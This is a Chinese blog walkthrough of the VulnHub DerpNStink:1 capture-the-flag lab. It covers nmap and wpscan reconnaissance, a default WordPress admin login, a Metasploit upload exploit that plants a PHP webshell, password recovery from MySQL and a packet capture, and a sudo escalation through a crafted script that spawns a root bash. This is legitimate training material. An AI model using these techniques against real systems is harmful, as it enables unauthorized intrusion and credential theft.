VULNHUB-DERPNSTINK: 1-靶机渗透

最新推荐文章于 2024-03-16 21:40:16 发布

synh04

最新推荐文章于 2024-03-16 21:40:16 发布

阅读量736

点赞数

分类专栏： web渗透靶场练习文章标签：安全 web安全系统安全

本文链接：https://blog.csdn.net/weixin_52374319/article/details/124743543

版权

web渗透靶场练习专栏收录该内容

3 篇文章 2 订阅

订阅专栏

VULNHUB-DERPNSTINK: 1-靶机渗透

靶机难度：中等（CTF）

靶场地址：https://www.vulnhub.com/entry/derpnstink-1,221/

kali攻击机ip：192.168.43.135

信息收集

arp-scan -l  #扫描靶机ip

在这里插入图片描述

端口扫描

nmap -sC -sV -T4 192.168.43.73

在这里插入图片描述

可以看到21，22，80端口开放

访问80端口，呆呆二人组。。。。。

在这里插入图片描述

好干净的页面，看一下源代码找到第一个flag

1651899073_6275fac1463b791529590.png!small

dirb目录爆破一下

dirb http://192.168.43.73

在这里插入图片描述

有好多，在根目录下分为3个目录 temporary、php、weblog其中观察weblog的子目录应该是wordpress框架，php目录下有phpmyadmin，挨个访问

在这里插入图片描述

phpmyadminds可以尝试弱密码登录和爆破，这里我们不尝试了。

weblog页面下一直跳转到http://derpnstink.local/这个链接，根据以往的经验需要改一下hosts文件

windows该文件在 C:\Windows\System32\drivers\etc\hosts （不知道为什么我windows加了不行所以我选择了用linux访问）

linux在/etc/hosts

在该文件中添加一条记录就行了

在这里插入图片描述

然后重新访问（是一个用wordpasswd搭建的网站）：

在这里插入图片描述

访问后台地址：http://192.168.43.73/weblog/wp-login.php，默认密码admin,admin登入后台

在这里插入图片描述

登陆，发现使用了WordPress 5.5.3管理系统
WordPress是使用PHP语言开发的博客平台

漏洞利用

wpscan扫一下

wpscan --url http://derpnstink.local/weblog/ #通用扫描
wpscan --url http://derpnstink.local/weblog/  --enumerate #枚举用户

发现了很多插件存在漏洞，打算利用两个漏洞

1、利用这个任意文件上传

在这里插入图片描述

使用msf查询一下（CVE-2014-5460）漏洞exp，有可以利用的exp

在这里插入图片描述

进入exp,执行Show options 查询一下配置

在这里插入图片描述

配置msf

set rhosts 192.168.43.73
set wp_user admin
set wp_password set vhost derpnstink.local
set targeturi /weblog/
exploit

在这里插入图片描述

python -c 'import pty; pty.spawn("/bin/bash")' #获取一个python shell就等于加强shell吧

在这里插入图片描述

2、管理侧边框的插件如下，这个插件存在文件上传漏洞

在这里插入图片描述

文件上传成功后来到先前利用的那个漏洞获得的shell，查看上传文件所在的位置：

在这里插入图片描述

木马地址：http://192.168.43.73/weblog/wp-content/uploads/slideshow-gallery/phpshell.php

存在：

在这里插入图片描述

中国蚁剑连接：

在这里插入图片描述

提权

查看当前角色和内核版本，普通用户和linux 4.4.0 框架I686

在这里插入图片描述

没找到可以利用的内核提权漏洞

发现靶机用root用户运行的mysql，看看可以可以使用udf提权

ps -ef | grep mysql

在配置文件里找到了，mysql管理员用户密码：

在这里插入图片描述

连接mysql：

在这里插入图片描述

查看发现不可以任意上传下载文件，只能在指定目录下上传下载文件，不可以使用udf

在这里插入图片描述

前面发现过一个mysql的管理界面，通过mysql账号密码登陆去看看(root,mysql)

在这里插入图片描述

在里面找到了第二个flag

在这里插入图片描述

在wp_users表中发现另一个用户unclestinky
和hash加密过后的密码

在这里插入图片描述

拿着hash去破解得到明文密码，我破解失败了，去网上查了一下密码是wedgie57

得到用户/密码
Unclestinky/wedgie57

在靶机home目录下发现两个用户，mrderp/stinky

在这里插入图片描述

使用刚刚得到的密码尝试登陆一下，发现ssh不支持密码密码登陆，只可以通过指纹登陆

在这里插入图片描述

尝试登陆一下，使用stinky/wedgie57登陆成功

在这里插入图片描述

使用命令 ls -al 查看当前目录下所有文件

在这里插入图片描述

找到第三个flag:

在这里插入图片描述

两个管理员的对话，大致是mrderp账户没了，stinky给他初始化了一个账号，mrderp用这个账号登上去更改了一下账号信息结束了，解题之道就在其中，但是还有个文件没看先看一下key.txt

ftp://192.168.43.148/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/key.txt

在这里插入图片描述

这熟悉的格式，是ssh私钥，放到kali上，保存到桌面/id_rsa中(好像放哪都一样) 使用私钥登一下

发现root和stinky都拒绝但是mrderp用户可以，不过需要输入密码

在这里插入图片描述

看来接下来只有登录到mrderp提权得到第四面旗子了，回到stinky找密码

我就盯着derpissues.txt琢磨了好久还是想不出来，又在stinky中进行了一波信息收集

在这里插入图片描述

这就是他们俩聊天中抓取的数据包了吧，作者设计的太巧妙了，吧这个数据包先复制到tmp文件夹下面然后通过蚁剑下载下来，放到kali用wireshark看一下，只看http请求就可以了

cp derpissues.pcap /tmp

在这里插入图片描述

事后发现只看post请求更清晰

http and http.request.method=="POST"

在这里插入图片描述

mrderp密码：derpderpderpderpderpderpderp

ssh登录mrderp

在这里插入图片描述

suid和sudo提权先试一下

在这里插入图片描述

好像可以sudo提权，但是没有这个路径我们自己创建一下就行了

先创建binaries目录，然后自己编辑一个derpy开头的可执行文件

mkdir binaries
cd binaries
echo "/bin/bash" >> derpy.sh
chmod +x derpy.sh 
sudo ./derpy.sh

在这里插入图片描述

在/root/Desktop目录下，获得第四个flag

在这里插入图片描述

synh04

关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
VULNHUB-DERPNSTINK: 1-靶机渗透

VULNHUB-DERPNSTINK: 1-靶机渗透靶机难度：中等（CTF）靶场地址：https://www.vulnhub.com/entry/derpnstink-1,221/kali攻击机ip：192.168.43.135信息收集arp-scan -l #扫描靶机ip端口扫描nmap -sC -sV -T4 192.168.43.73 可以看到21，22，80端口开放访问80端口，呆呆二人组。。。。。好干净的页面，看一下源代码找到第一个flagdirb目录爆破一
复制链接

扫一扫